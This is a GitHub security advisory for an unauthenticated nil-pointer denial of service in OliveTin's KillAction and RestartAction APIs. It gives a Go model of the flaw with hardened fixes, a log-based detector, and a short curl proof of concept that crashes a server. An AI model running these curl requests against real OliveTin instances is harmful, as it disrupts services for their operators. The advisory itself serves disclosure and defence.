
OliveTin crashes with a nil-pointer dereference when APIs are called with invalid bindings or log references

Moderate severity GitHub Reviewed Published Mar 5, 2026 in OliveTin/OliveTin • Updated Mar 5, 2026

Package

gomod github.com/OliveTin/OliveTin (Go)

Affected versions

< 0.0.0-20260304225158-bb14c5da3e64

Patched versions

0.0.0-20260304225158-bb14c5da3e64

Description

Summary

An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via StartActionByGet (using an invalid action ID), then calling KillAction or RestartAction with that tracking ID. The API handlers dereference the nil binding, so every such request panics (the client sees "Empty reply from server"). Because the panic is repeatable per request, this enables denial of service through panic, log and CPU amplification.

Details

The issue is caused by this flow:

  1. StartActionByGet accepts an arbitrary actionId and still calls the executor (service/internal/api/api.go:239).
  2. The executor stores a log entry before validating the binding (service/internal/executor/executor.go:519).
  3. If the binding is nil, execution stops, but the log entry remains (service/internal/executor/executor.go:781).
  4. KillAction dereferences execReqLogEntry.Binding.Action without checking Binding for nil (service/internal/api/api.go:79).
  5. RestartAction has the same unsafe dereference (service/internal/api/api.go:1285).

Because the dereference happens before the authorization checks in these handlers, the crash is reachable without credentials.
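The flow above reduces to two defects: the executor records a log entry before it knows the action exists, and the kill/restart handlers reach through entry.Binding.Action without a nil check. The following Go program, written for this advisory and not taken from OliveTin's code base, models both with simplified stand-in types (Action, ActionBinding, LogEntry, Executor and the method names are assumptions) and shows the vulnerable ordering and handler beside hardened versions that validate before recording and return an error instead of panicking:

```go
package main

import (
	"errors"
	"fmt"
	"sync"
)

// Simplified stand-ins for OliveTin's executor and API types (assumed names,
// not the project's own code). An execution log entry carries a pointer to the
// action binding that was resolved from the request's actionId.
type Action struct{ Title string }
type ActionBinding struct{ Action *Action }

type LogEntry struct {
	TrackingID string
	Binding    *ActionBinding // nil when actionId did not resolve to an action
}

type Executor struct {
	mu      sync.Mutex
	actions map[string]*ActionBinding // actionId -> binding
	logs    map[string]*LogEntry      // executionTrackingId -> entry
}

func NewExecutor(actions map[string]*ActionBinding) *Executor {
	return &Executor{actions: actions, logs: map[string]*LogEntry{}}
}

// StartVulnerable follows the order the advisory describes: the log entry is
// recorded first, and only then is the binding checked. An unknown actionId
// therefore leaves an orphan entry whose Binding is nil.
func (e *Executor) StartVulnerable(trackingID, actionID string) {
	e.mu.Lock()
	defer e.mu.Unlock()
	entry := &LogEntry{TrackingID: trackingID, Binding: e.actions[actionID]}
	e.logs[trackingID] = entry // stored before validation
	if entry.Binding == nil {
		return // execution stops, but the entry stays in the log
	}
	// ... the real executor would run the action here ...
}

// StartHardened validates the binding before anything is recorded, so the log
// never contains an entry without an action.
func (e *Executor) StartHardened(trackingID, actionID string) error {
	e.mu.Lock()
	defer e.mu.Unlock()
	b := e.actions[actionID]
	if b == nil || b.Action == nil {
		return errors.New("unknown action: " + actionID)
	}
	e.logs[trackingID] = &LogEntry{TrackingID: trackingID, Binding: b}
	return nil
}

// KillVulnerable mirrors the handler pattern in the advisory: it reaches through
// entry.Binding.Action without checking that the entry or its Binding exist.
// Both an orphan entry (Binding == nil) and an unknown tracking ID (entry == nil)
// make this panic with a nil pointer dereference.
func (e *Executor) KillVulnerable(trackingID string) string {
	e.mu.Lock()
	defer e.mu.Unlock()
	entry := e.logs[trackingID]
	return "killing " + entry.Binding.Action.Title
}

// KillHardened checks every pointer on the path and turns the bad cases into
// ordinary errors that the HTTP layer can map to a 4xx response. The same check
// belongs in RestartAction, which the advisory says shares the dereference.
func (e *Executor) KillHardened(trackingID string) (string, error) {
	e.mu.Lock()
	defer e.mu.Unlock()
	entry, ok := e.logs[trackingID]
	if !ok {
		return "", errors.New("unknown execution tracking id")
	}
	if entry.Binding == nil || entry.Binding.Action == nil {
		return "", errors.New("execution has no action binding")
	}
	return "killing " + entry.Binding.Action.Title, nil
}

// Panics reports whether f panics, standing in for net/http's per-request
// recovery that turns the panic into the "Empty reply from server" the PoC sees.
func Panics(f func()) (panicked bool) {
	defer func() {
		if recover() != nil {
			panicked = true
		}
	}()
	f()
	return false
}

func main() {
	ex := NewExecutor(map[string]*ActionBinding{"ping": {Action: &Action{Title: "Ping"}}})
	ex.StartVulnerable("t1", "does-not-exist") // orphan entry with nil Binding
	fmt.Println("vulnerable KillAction panics:", Panics(func() { ex.KillVulnerable("t1") }))
	_, err := ex.KillHardened("t1")
	fmt.Println("hardened KillAction error:", err)
	fmt.Println("hardened start error:", ex.StartHardened("t2", "does-not-exist"))
}
```

Both fixes are worth applying together: the handler check alone stops the panic but still lets an unauthenticated caller populate the execution log with orphan entries, while the executor-side check alone leaves the handlers one unexpected nil away from the same crash.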

PoC

Environment:

  • OliveTin default single frontend on http://localhost:1337
  • Reproduced on main (commit 235493e) and tag 3000.11.0

  1. Create an orphan tracking ID with an invalid action:

T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
  -H 'Content-Type: application/json' \
  --data '{"actionId":"does-not-exist"}' \
  | sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
# Stop here if no tracking ID came back (e.g. a patched server rejected the action)
[ -n "$T" ] || { echo "no executionTrackingId in response"; exit 1; }
echo "$T"

  2. Trigger the panic in RestartAction:

curl -v -X POST http://localhost:1337/api/RestartAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"

  3. Trigger the panic in KillAction:

curl -v -X POST http://localhost:1337/api/KillAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"

Observed client output:

- curl: (52) Empty reply from server

Observed server log:

- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
    - service/internal/api/api.go:79 (KillAction)
    - service/internal/api/api.go:1285 (RestartAction)
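The server-side symptom is a recognisable signature: net/http logs each recovered request panic as "http: panic serving <remote>: <value>" followed by the goroutine trace, and here the value is a nil pointer dereference with a frame in service/internal/api/api.go. The following Go program is an added detection example for operators, not part of the advisory or of OliveTin; it runs over a constructed log excerpt (the timestamps, addresses, goroutine numbers and frame offsets are made up, the frame paths are the ones the advisory names) and flags any source address that produces a burst of such panics within one minute, which is what the PoC loop looks like from the defender's side:

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"regexp"
	"strings"
)

// Constructed sample log, not captured from a real OliveTin instance. The panic
// lines follow net/http's "http: panic serving <remote>: <value>" message with
// the standard log package timestamp; the trace is trimmed to one frame each.
// Four panics come from one source within a minute, one unrelated panic from
// another source.
const sampleLog = `2026/03/05 10:00:01 http: panic serving 203.0.113.7:53112: runtime error: invalid memory address or nil pointer dereference
goroutine 42 [running]:
	/src/service/internal/api/api.go:79 +0x1a4
2026/03/05 10:00:02 http: panic serving 203.0.113.7:53114: runtime error: invalid memory address or nil pointer dereference
goroutine 47 [running]:
	/src/service/internal/api/api.go:1285 +0x2c8
2026/03/05 10:00:02 http: panic serving 203.0.113.7:53116: runtime error: invalid memory address or nil pointer dereference
goroutine 51 [running]:
	/src/service/internal/api/api.go:79 +0x1a4
2026/03/05 10:00:03 http: panic serving 203.0.113.7:53118: runtime error: invalid memory address or nil pointer dereference
goroutine 55 [running]:
	/src/service/internal/api/api.go:1285 +0x2c8
2026/03/05 10:00:40 http: panic serving 198.51.100.4:41002: runtime error: index out of range [3] with length 3
goroutine 60 [running]:
	/src/service/internal/other/other.go:12 +0x90
`

var (
	// Captures the minute (aggregation window), the remote address and the panic value.
	panicRe = regexp.MustCompile(`^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}):\d{2} http: panic serving (\S+): (.*)$`)
	// A frame inside the API handler package, where the advisory places both dereferences.
	apiFrameRe = regexp.MustCompile(`service/internal/api/api\.go:\d+`)
)

// PanicEvent is one recovered request panic with the attributes the detection keys on.
type PanicEvent struct {
	Minute   string // "YYYY/MM/DD HH:MM"
	Source   string // remote IP without the ephemeral port
	Reason   string
	APIFrame bool // a frame in service/internal/api/api.go followed the panic line
}

// ParsePanics extracts panic events and attributes the trace lines that follow
// each panic line to that event.
func ParsePanics(logText string) []PanicEvent {
	var events []PanicEvent
	sc := bufio.NewScanner(strings.NewReader(logText))
	for sc.Scan() {
		line := sc.Text()
		if m := panicRe.FindStringSubmatch(line); m != nil {
			host, _, err := net.SplitHostPort(m[2])
			if err != nil {
				host = m[2] // keep the raw address if it has no port
			}
			events = append(events, PanicEvent{Minute: m[1], Source: host, Reason: m[3]})
			continue
		}
		if len(events) > 0 && apiFrameRe.MatchString(line) {
			events[len(events)-1].APIFrame = true
		}
	}
	return events
}

// NilDerefBursts counts nil-pointer panics raised in the API handlers per source
// and minute and returns the "source minute" keys at or above threshold. A single
// panic may be an accident; a burst from one address matches the PoC loop.
func NilDerefBursts(events []PanicEvent, threshold int) map[string]int {
	counts := map[string]int{}
	for _, ev := range events {
		if ev.APIFrame && strings.Contains(ev.Reason, "nil pointer dereference") {
			counts[ev.Source+" "+ev.Minute]++
		}
	}
	bursts := map[string]int{}
	for key, n := range counts {
		if n >= threshold {
			bursts[key] = n
		}
	}
	return bursts
}

func main() {
	for key, n := range NilDerefBursts(ParsePanics(sampleLog), 3) {
		fmt.Printf("ALERT possible GHSA-fwhj-785h-43hh abuse: %s (%d panics)\n", key, n)
	}
}
```

Keying on the api.go frame plus the nil-dereference reason keeps unrelated panics out of the alert; if OliveTin runs behind a reverse proxy, the logged remote address is the proxy's, so the per-source count then has to come from the proxy's access log instead.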

Impact

This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.

References

@jamesread jamesread published to OliveTin/OliveTin Mar 5, 2026
Published to the GitHub Advisory Database Mar 5, 2026
Reviewed Mar 5, 2026
Last updated Mar 5, 2026

Severity

Moderate


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L


Weaknesses

Improper Input Validation (CWE-20)

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

NULL Pointer Dereference (CWE-476)

The product dereferences a pointer that it expects to be valid but is NULL.

CVE ID

No known CVE

GHSA ID

GHSA-fwhj-785h-43hh
